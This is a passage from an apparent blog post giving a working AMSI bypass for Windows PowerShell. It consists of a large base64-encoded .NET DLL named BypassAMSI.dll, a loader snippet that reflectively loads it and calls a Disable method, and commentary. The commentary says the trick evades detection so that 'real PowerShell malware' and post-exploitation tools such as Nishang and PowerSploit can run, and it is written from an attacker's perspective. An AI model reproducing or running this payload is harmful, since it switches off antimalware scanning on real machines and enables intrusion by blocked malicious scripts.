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")) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable()
}

This will bypass string detection because it does not uses anything malicious at all. It just loads an .NET assembly to memory and execute it’s code. And after executing it, you are FREE to execute real PowerShell malware!

Check my results:

Screenshot

This technique is awesome and extremly useful. You can put to use a handful of PowerShell post-exploitation scripts like Nishang, Powersploit and any other PoSH hacking tool that once was blocked by the annoying AMSI.

I hope you liked this post, all the credits for the technique goes to guys from CyberArk website, I only showed how to effectively use it in a real-life scenario from an attacker perspective.

Best regards,

zc00l.